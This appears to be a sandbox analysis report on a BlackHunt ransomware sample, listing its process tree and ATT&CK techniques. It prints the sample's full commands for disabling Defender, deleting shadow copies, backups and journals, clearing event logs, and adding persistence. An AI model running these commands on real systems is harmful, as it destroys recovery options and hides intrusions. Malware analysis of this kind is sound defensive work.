PID 4520 wrote to memory of 964 | 4520 | cmd.exe | 140
PID 4520 wrote to memory of 964 | 4520 | cmd.exe | 140
System policy modification (1 TTP, 3 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(Tree depth is shown as [1], [2], [3]; each entry lists the image path, the command line, the signatures triggered and the PID.)

[1] C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID: 4276

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        - Suspicious use of WriteProcessMemory
        PID: 4852

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
            - Modifies registry class
            PID: 1116

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Suspicious use of WriteProcessMemory
        PID: 3972

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            - Modifies registry class
            PID: 3636

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        - Suspicious use of WriteProcessMemory
        PID: 5016

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
            - Modifies registry class
            PID: 3708

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Suspicious use of WriteProcessMemory
        PID: 1236

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            - Modifies registry class
            PID: 2320

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        PID: 3420

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
            - Adds Run key to start application
            PID: 1068

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        - Suspicious use of WriteProcessMemory
        PID: 1040

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            PID: 1988

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        - Suspicious use of WriteProcessMemory
        PID: 4720

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
            PID: 3372

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        - Suspicious use of WriteProcessMemory
        PID: 2888

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
            PID: 3200

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        - Suspicious use of WriteProcessMemory
        PID: 4456

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
            PID: 3696

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
        - Suspicious use of WriteProcessMemory
        PID: 3140

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
            PID: 4388

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
        - Suspicious use of WriteProcessMemory
        PID: 3184

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
            PID: 4348

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
        - Suspicious use of WriteProcessMemory
        PID: 2384

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
            PID: 4876

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        - Suspicious use of WriteProcessMemory
        PID: 4380

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
            PID: 3652

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
        - Suspicious use of WriteProcessMemory
        PID: 4520

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
            PID: 964

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
        PID: 3528

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
            PID: 3332

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
        PID: 1840

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
            PID: 4528

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
        PID: 2024

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
            PID: 2232

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
        PID: 3556

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
            PID: 4616

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
        PID: 2432

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
            PID: 1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3300
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2012
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3948
-
-
-
  - C:\Windows\System32\cmd.exe (PID 1416)
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F
    - C:\Windows\system32\schtasks.exe (PID 4984)
      SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F
      Signatures: Creates scheduled task(s)
  - C:\Windows\System32\cmd.exe (PID 3192)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    - C:\Windows\system32\vssadmin.exe (PID 4588)
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      Signatures: Enumerates connected drives; Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 4988)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    - C:\Windows\system32\vssadmin.exe (PID 1120)
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
      Signatures: Enumerates connected drives; Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 5008)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    - C:\Windows\system32\vssadmin.exe (PID 4064)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      Signatures: Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 372)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    - C:\Windows\System32\Conhost.exe (PID 3372)
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Signatures: Modifies Windows Defender Real-time Protection settings
    - C:\Windows\system32\vssadmin.exe (PID 3928)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      Signatures: Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 4512)
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    - C:\Windows\system32\vssadmin.exe (PID 5540)
      vssadmin.exe Delete Shadows /all /quiet
      Signatures: Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 5020)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    - C:\Windows\system32\bcdedit.exe (PID 5576)
      bcdedit /set {default} recoveryenabled No
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe (PID 4316)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - C:\Windows\system32\bcdedit.exe (PID 5568)
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe (PID 1708)
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    - C:\Windows\system32\wbadmin.exe (PID 5552)
      wbadmin.exe delete catalog -quiet
      Signatures: Deletes backup catalog
  - C:\Windows\System32\cmd.exe (PID 964)
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    - C:\Windows\system32\fsutil.exe (PID 5608)
      fsutil.exe usn deletejournal /D C:
      Signatures: Deletes NTFS Change Journal
  - C:\Windows\System32\cmd.exe (PID 4608)
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    - C:\Windows\system32\schtasks.exe (PID 5620)
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 1700)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    - C:\Windows\system32\fsutil.exe (PID 3500)
      fsutil usn deletejournal /D F:\
      Signatures: Enumerates connected drives
  - C:\Windows\System32\cmd.exe (PID 4800)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    - C:\Windows\system32\fsutil.exe (PID 1416)
      fsutil usn deletejournal /D C:\
  - C:\Windows\System32\cmd.exe (PID 5164)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    - C:\Windows\system32\fsutil.exe (PID 720)
      fsutil usn deletejournal /D M:\
      Signatures: Enumerates connected drives
  - C:\Windows\System32\cmd.exe (PID 5688)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    - C:\Windows\system32\wevtutil.exe (PID 5384)
      wevtutil.exe cl Setup
      Signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 5152)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    - C:\Windows\system32\wevtutil.exe (PID 6060)
      wevtutil.exe cl System
      Signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 5692)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    - C:\Windows\system32\wevtutil.exe (PID 3440)
      wevtutil.exe cl Security
      Signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 5832)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    - C:\Windows\system32\wevtutil.exe (PID 3924)
      wevtutil.exe cl Application
      Signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 5612)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    - C:\Windows\system32\wevtutil.exe (PID 3464)
      wevtutil.exe cl Security /e:false
      Signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 5756)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    - C:\Windows\system32\bcdedit.exe (PID 732)
      bcdedit /set {default} recoveryenabled No
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe (PID 5212)
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    - C:\Windows\system32\vssadmin.exe (PID 1352)
      vssadmin.exe Delete Shadows /all /quiet
      Signatures: Interacts with shadow copies
  - C:\Windows\System32\cmd.exe (PID 5940)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - C:\Windows\system32\bcdedit.exe (PID 416)
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe (PID 5964)
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    - C:\Windows\system32\fsutil.exe (PID 2700)
      fsutil.exe usn deletejournal /D C:
      Signatures: Deletes NTFS Change Journal
  - C:\Windows\System32\cmd.exe (PID 2888)
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    - C:\Windows\system32\wbadmin.exe (PID 2236)
      wbadmin.exe delete catalog -quiet
      Signatures: Deletes backup catalog
  - C:\Windows\System32\cmd.exe (PID 6136)
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    - C:\Windows\system32\schtasks.exe (PID 4744)
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 212)
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    - C:\Windows\system32\reg.exe (PID 3904)
      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  - C:\Windows\System32\cmd.exe (PID 4196)
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    - C:\Windows\system32\reg.exe (PID 4060)
      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  - C:\Windows\System32\cmd.exe (PID 1880)
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    - C:\Windows\system32\schtasks.exe (PID 2528)
      SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  - C:\Windows\System32\cmd.exe (PID 404)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    - C:\Windows\system32\reg.exe (PID 4948)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 4356)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    - C:\Windows\system32\reg.exe (PID 3172)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 5480)
    "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    - C:\Windows\system32\taskkill.exe (PID 4892)
      taskkill /IM mshta.exe /f
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 4020)
    "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    - C:\Windows\system32\notepad.exe (PID 3004)
      notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  - C:\Windows\System32\cmd.exe (PID 2384)
    "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
    Signatures: Checks computer location settings; Modifies registry class
    - C:\Windows\SysWOW64\mshta.exe (PID 5148)
      "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      - C:\Windows\SysWOW64\WerFault.exe (PID 268)
        C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1424
        Signatures: Program crash
  - C:\Windows\SysWOW64\cmd.exe (PID 5324)
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"
    - C:\Windows\SysWOW64\PING.EXE (PID 5456)
      ping 127.0.0.1 -n 5
      Signatures: Runs ping.exe
- C:\Windows\system32\vssvc.exe (PID 5496)
  C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbengine.exe (PID 408)
  "C:\Windows\system32\wbengine.exe"
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\vdsldr.exe (PID 1316)
  C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\System32\vds.exe (PID 2320)
  C:\Windows\System32\vds.exe
  Signatures: Checks SCSI registry key(s)
- C:\Windows\SysWOW64\WerFault.exe (PID 5992)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5148 -ip 5148
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads